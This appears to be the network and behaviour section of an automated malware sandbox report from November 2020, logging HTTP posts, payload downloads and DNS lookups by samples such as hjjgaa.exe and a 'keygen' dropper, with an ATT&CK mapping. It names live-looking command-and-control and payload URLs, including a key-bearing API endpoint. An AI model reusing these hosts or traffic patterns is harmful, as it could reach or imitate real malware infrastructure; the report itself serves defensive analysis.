Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d07538c27063f1fb3b3a48b1afc9d51dc1605715483; expires=Fri, 18-Dec-20 16:04:43 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db2f1ae0000dc1faa1fe000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jKGO2tQh1l7cRrM9YaPzpAhUCf38i7isNJY1ssTi9yMpN4qWJ1mY%2Fqlo7UYtnM2ayCgvd8c0oi8yWIiLJUJtJnGaCSpyX1fbiIJCkH86Uj8TkVc4Xw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42edc91882dc1f-LHR
POST

http://8d96c6c8686c52e7.xyz/info/w

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dc2ca38497b90ead6555dc75a5a84a0b31605715444; expires=Fri, 18-Dec-20 16:04:04 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db25ad20000ce7f2ebab000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WQ8byaS%2BXp%2FkZ%2F1FBX3pPktYRMbN3kZdhn4l2FNceXExBUeW8lZTaDtFqppVGa3zCqO1H011p%2Bm3yxjeKarls7unY%2Fm8iafqi5MbQY6L4Uz9QmgsXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ecd7bac9ce7f-LHR
POST

http://8d96c6c8686c52e7.xyz/info/w

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d889897b33002e7adc1350571fb02f61b1605715448; expires=Fri, 18-Dec-20 16:04:08 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db269c60000ce7f600bc000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=q2jsidSdIC4wVlnSrSomoShHVGx6GaOc4ZwtBP1WfLEvQGOdCKpin6InfmztcazoCp2T30lacICKqMvBS4LCke8o2TR59GfPBwa5TZkzWSUH%2FKlL7A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ecefaec7ce7f-LHR
GET

http://101.36.107.74/seemorebty/poe.php?e=jg2_2qua

jg2_2qua.exe

Remote address:

101.36.107.74:80

Request

GET /seemorebty/poe.php?e=jg2_2qua HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0
Host: 101.36.107.74

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:09 GMT
Server: Apache/2.4.37 (centos)
X-Powered-By: PHP/7.2.24
Content-Length: 0
Content-Type: text/html; charset=UTF-8
DNS

ip-api.com

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/

hjjgaa.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
viewport-width: 1920
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:09 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 322
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

www.facebook.com

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.210.35
GET

https://www.facebook.com/

hjjgaa.exe

Remote address:

157.240.210.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

Vary: Accept-Encoding
Pragma: no-cache
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=15552000; preload
X-XSS-Protection: 0
X-Frame-Options: DENY
Cache-Control: private, no-cache, no-store, must-revalidate
content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self' chrome-extension://boadgeojelhgndaghljhdicfkmllpafd chrome-extension://dliochdbjfkdbacpmhlcpmleaejidimm;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Content-Type: text/html; charset="utf-8"
X-FB-Debug: zGqF38ipa2nFXZrWHcCUNeM6o8MYXq9ZRpI2yeH/BqjtfQBvFfPG7wTU3WQAR9Lp1oaDzBIlULD34dWQ62L0Jw==
Date: Wed, 18 Nov 2020 16:04:13 GMT
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
GET

https://www.facebook.com/

hjjgaa.exe

Remote address:

157.240.210.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

Vary: Accept-Encoding
Pragma: no-cache
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=15552000; preload
X-XSS-Protection: 0
X-Frame-Options: DENY
Cache-Control: private, no-cache, no-store, must-revalidate
content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self' chrome-extension://boadgeojelhgndaghljhdicfkmllpafd chrome-extension://dliochdbjfkdbacpmhlcpmleaejidimm;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Content-Type: text/html; charset="utf-8"
X-FB-Debug: azqB9KwylEgN8cFT1IWDghKlE+8G3B68P/xMpVtLkSqO175C5v5OK+w57lGMZlSdYuck9OXjiuOtWJcGGR1FXA==
Date: Wed, 18 Nov 2020 16:04:48 GMT
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
DNS

e35654c2a64bf304.club

Remote address:

8.8.8.8:53

Request

e35654c2a64bf304.club

IN A

Response

e35654c2a64bf304.club

IN A

104.27.141.60

e35654c2a64bf304.club

IN A

104.27.140.60

e35654c2a64bf304.club

IN A

172.67.209.249
POST

https://e35654c2a64bf304.club/Info_t/up

97535F5358BB4449.exe

Remote address:

104.27.141.60:443

Request

POST /Info_t/up HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 157
Host: e35654c2a64bf304.club

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dc682813923e58bc7c81509ea7d3e42e21605715464; expires=Fri, 18-Dec-20 16:04:24 GMT; path=/; domain=.e35654c2a64bf304.club; HttpOnly; SameSite=Lax; Secure
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db2a9f000001ffc8e3a2000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=OZAnJuQmjzALNepti8%2BCSF2qZOCu80zB5FWyhNyZSQU6x6ODk%2FhpxZThxWNDlCuXgOwW2%2BfDoK0VFYiOGaKU3BH2tGbGLE6KwdSuJAQ0ox1UKMj43Mg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed564fc21ffc-AMS
DNS

8D96C6C8686C52E7.xyz

Remote address:

8.8.8.8:53

Request

8D96C6C8686C52E7.xyz

IN A

Response

8D96C6C8686C52E7.xyz

IN A

104.18.42.86

8D96C6C8686C52E7.xyz

IN A

104.18.43.86

8D96C6C8686C52E7.xyz

IN A

172.67.204.197
GET

http://8D96C6C8686C52E7.xyz/info/d

PlugPlay

Remote address:

104.18.42.86:80

Request

GET /info/d HTTP/1.1
Host: 8D96C6C8686C52E7.xyz
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d6df43a736455f2f83dc5d069f7c858d91605715489; expires=Fri, 18-Dec-20 16:04:49 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db30c2f0000070a9b3e1000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cOwpRnz2MP8UADDMZ5%2BrdH8qoJLAsSqR8EZ1thglsxbUMcg%2Fen7EPu2zTfG%2B9QPyL4ATJsA%2FvW2AUqKZ88OgWwLC%2FCvvBqb0%2F0Jtaq%2FA6V3Wv4bhlg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42edf37ae1070a-LHR
DNS

range6d109e83.xyz

Remote address:

8.8.8.8:53

Request

range6d109e83.xyz

IN A

Response

range6d109e83.xyz

IN A

104.24.114.246

range6d109e83.xyz

IN A

104.24.115.246

range6d109e83.xyz

IN A

172.67.160.103
GET

http://range6d109e83.xyz/apple/two

PlugPlay

Remote address:

104.24.114.246:80

Request

GET /apple/two HTTP/1.1
Host: range6d109e83.xyz
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:57 GMT
Content-Type: application/octet-stream
Content-Length: 923827
Connection: keep-alive
Set-Cookie: __cfduid=d784ca5fbbe89a78848fe14c3f14dfd5d1605715491; expires=Fri, 18-Dec-20 16:04:51 GMT; path=/; domain=.range6d109e83.xyz; HttpOnly; SameSite=Lax
Content-Disposition: attachment; filename="5fb54629c1b69.vip"
Expires: 0
Content-Transfer-Encoding: binary
Cache-Control: private, no-transform, no-store, must-revalidate
CF-Cache-Status: DYNAMIC
cf-request-id: 067db312420000004e03bc7000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ukGPaSz0N3BD7rOhkaziJS5UHkqqRqPASHKNUOsXEtObnMNPAdoIoTNyGGMfVCTNRxWZi1CMMIO0%2Bpye6C0txht9E%2BnIBU4wRc7qSga1JQIF%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42edfd39d9004e-LHR
DNS

uskskskggkk3.2ihsfa.com

Remote address:

8.8.8.8:53

Request

uskskskggkk3.2ihsfa.com

IN A

Response

uskskskggkk3.2ihsfa.com

IN A

207.246.80.14
GET

http://uskskskggkk3.2ihsfa.com/api/fbtime

hjjgaa.exe

Remote address:

207.246.80.14:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Host: uskskskggkk3.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:05:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
POST

http://uskskskggkk3.2ihsfa.com/api/?sid=526904&key=28ee1ca34a8130a04411ec5457179d07

hjjgaa.exe

Remote address:

207.246.80.14:80

Request

POST /api/?sid=526904&key=28ee1ca34a8130a04411ec5457179d07 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Content-Length: 266
Host: uskskskggkk3.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:05:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23

172.67.194.164:80

http://kvaka.li/1210776429.php

http

keygen-step-1.exe

583 B
1.1kB
7
6

HTTP Request

POST http://kvaka.li/1210776429.php

HTTP Response

200
104.18.57.131:443

https://a.kvaka.li/ip.php?auth=99e2d4bb541d744938d10e755a05f2d5

tls, http

intro.exe

1.3kB
4.9kB
13
11

HTTP Request

GET https://a.kvaka.li/ip.php

HTTP Response

302

HTTP Request

GET https://a.kvaka.li/ip.php?auth=99e2d4bb541d744938d10e755a05f2d5

HTTP Response

200
88.99.66.31:443

https://iplogger.org/1ahRe7

tls, http

intro.exe

1.1kB
4.4kB
11
7

HTTP Request

GET https://iplogger.org/1ahRe7

HTTP Response

200
194.54.83.254:80

http://ffdownload.online/business/receive

http

002.exe

1.0kB
383 B
6
5

HTTP Request

POST http://ffdownload.online/business/receive

HTTP Response

200
101.36.107.74:80

http://101.36.107.74/seemorebty/il.php?e=jg2_2qua

http

jg2_2qua.exe

690 B
487 B
6
5

HTTP Request

GET http://101.36.107.74/seemorebty/il.php?e=jg2_2qua

HTTP Response

200
88.99.66.31:443

https://iplogger.org/ZdnY7

tls, http

jg2_2qua.exe

1.1kB
5.3kB
9
9

HTTP Request

GET https://iplogger.org/ZdnY7

HTTP Response

200
104.18.42.86:80

http://8d96c6c8686c52e7.xyz/info/w

http

aliens.exe

2.4kB
2.7kB
12
10

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200
104.18.42.86:80

http://8d96c6c8686c52e7.xyz/info/w

http

97535F5358BB4449.exe

6.9kB
7.2kB
25
27

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/e

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/g

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

GET http://8d96c6c8686c52e7.xyz/info/r

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/a

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200
104.18.42.86:80

http://8d96c6c8686c52e7.xyz/info/w

http

97535F5358BB4449.exe

1.6kB
1.8kB
8
7

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200
101.36.107.74:80

http://101.36.107.74/seemorebty/poe.php?e=jg2_2qua

http

jg2_2qua.exe

336 B
305 B
5
3

HTTP Request

GET http://101.36.107.74/seemorebty/poe.php?e=jg2_2qua

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json/

http

hjjgaa.exe

759 B
671 B
6
4

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
157.240.210.35:443

https://www.facebook.com/

tls, http

hjjgaa.exe

13.6kB
608.6kB
261
461

HTTP Request

GET https://www.facebook.com/

HTTP Response

200

HTTP Request

GET https://www.facebook.com/

HTTP Response

200
104.27.141.60:443

https://e35654c2a64bf304.club/Info_t/up

tls, http

97535F5358BB4449.exe

1.4kB
4.0kB
9
9

HTTP Request

POST https://e35654c2a64bf304.club/Info_t/up

HTTP Response

200
104.18.42.86:80

http://8D96C6C8686C52E7.xyz/info/d

http

PlugPlay

341 B
1.0kB
6
5

HTTP Request

GET http://8D96C6C8686C52E7.xyz/info/d

HTTP Response

200
104.24.114.246:80

http://range6d109e83.xyz/apple/two

http

PlugPlay

15.1kB
950.5kB
327
642

HTTP Request

GET http://range6d109e83.xyz/apple/two

HTTP Response

200
207.246.80.14:80

http://uskskskggkk3.2ihsfa.com/api/?sid=526904&key=28ee1ca34a8130a04411ec5457179d07

http

hjjgaa.exe

1.2kB
1.1kB
9
8

HTTP Request

GET http://uskskskggkk3.2ihsfa.com/api/fbtime

HTTP Response

200

HTTP Request

POST http://uskskskggkk3.2ihsfa.com/api/?sid=526904&key=28ee1ca34a8130a04411ec5457179d07

HTTP Response

200

8.8.8.8:53

kvaka.li

dns

54 B
102 B
1
1

DNS Request

kvaka.li

DNS Response

172.67.194.164

104.18.57.131

104.18.56.131
8.8.8.8:53

a.kvaka.li

dns

56 B
104 B
1
1

DNS Request

a.kvaka.li

DNS Response

104.18.57.131

104.18.56.131

172.67.194.164
8.8.8.8:53

iplogger.org

dns

58 B
74 B
1
1

DNS Request

iplogger.org

DNS Response

88.99.66.31
8.8.8.8:53

ffdownload.online

dns

63 B
79 B
1
1

DNS Request

ffdownload.online

DNS Response

194.54.83.254
8.8.8.8:53

8d96c6c8686c52e7.xyz

dns

66 B
114 B
1
1

DNS Request

8d96c6c8686c52e7.xyz

DNS Response

104.18.42.86

104.18.43.86

172.67.204.197
8.8.8.8:53

ip-api.com

dns

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

www.facebook.com

dns

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.210.35
8.8.8.8:53

e35654c2a64bf304.club

dns

67 B
115 B
1
1

DNS Request

e35654c2a64bf304.club

DNS Response

104.27.141.60

104.27.140.60

172.67.209.249
8.8.8.8:53

8D96C6C8686C52E7.xyz

dns

66 B
114 B
1
1

DNS Request

8D96C6C8686C52E7.xyz

DNS Response

104.18.42.86

104.18.43.86

172.67.204.197
8.8.8.8:53

range6d109e83.xyz

dns

63 B
111 B
1
1

DNS Request

range6d109e83.xyz

DNS Response

104.24.114.246

104.24.115.246

172.67.160.103
8.8.8.8:53

uskskskggkk3.2ihsfa.com

dns

69 B
85 B
1
1

DNS Request

uskskskggkk3.2ihsfa.com

DNS Response

207.246.80.14

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/392-33-0x0000000072E80000-0x0000000072F13000-memory.dmp

Filesize
588KB

Download
memory/392-35-0x0000000071C70000-0x000000007235E000-memory.dmp

Filesize
6.9MB

Download
memory/392-40-0x0000000010C60000-0x0000000010C61000-memory.dmp

Filesize
4KB

Download
memory/392-38-0x0000000010C40000-0x0000000010C41000-memory.dmp

Filesize
4KB

Download
memory/708-198-0x0000000010000000-0x00000000100B9000-memory.dmp

Filesize
740KB

Download
memory/708-196-0x0000029597490000-0x0000029597491000-memory.dmp

Filesize
4KB

Download
memory/744-73-0x00007FF81A690000-0x00007FF81A70E000-memory.dmp

Filesize
504KB

Download
memory/744-74-0x0000000010000000-0x0000000010057000-memory.dmp

Filesize
348KB

Download
memory/1328-96-0x0000000072E80000-0x0000000072F13000-memory.dmp

Filesize
588KB

Download
memory/1344-44-0x0000000072E80000-0x0000000072F13000-memory.dmp

Filesize
588KB

Download
memory/1396-100-0x00007FF81A690000-0x00007FF81A70E000-memory.dmp

Filesize
504KB

Download
memory/1404-79-0x0000000072E80000-0x0000000072F13000-memory.dmp

Filesize
588KB

Download
memory/2152-70-0x0000000003DB0000-0x0000000004213000-memory.dmp

Filesize
4.4MB

Download
memory/2152-59-0x0000000072E80000-0x0000000072F13000-memory.dmp

Filesize
588KB

Download
memory/2192-104-0x0000000072E80000-0x0000000072F13000-memory.dmp

Filesize
588KB

Download
memory/2796-69-0x0000000003760000-0x0000000003BC3000-memory.dmp

Filesize
4.4MB

Download
memory/2796-62-0x0000000072E80000-0x0000000072F13000-memory.dmp

Filesize
588KB

Download
memory/3364-107-0x00007FF81A690000-0x00007FF81A70E000-memory.dmp

Filesize
504KB

Download
memory/3732-48-0x0000000072E80000-0x0000000072F13000-memory.dmp

Filesize
588KB

Download
memory/3732-52-0x0000000010000000-0x0000000010220000-memory.dmp

Filesize
2.1MB

Download
memory/3832-92-0x00007FF81A690000-0x00007FF81A70E000-memory.dmp

Filesize
504KB

Download
memory/3904-112-0x0000000072E80000-0x0000000072F13000-memory.dmp

Filesize
588KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response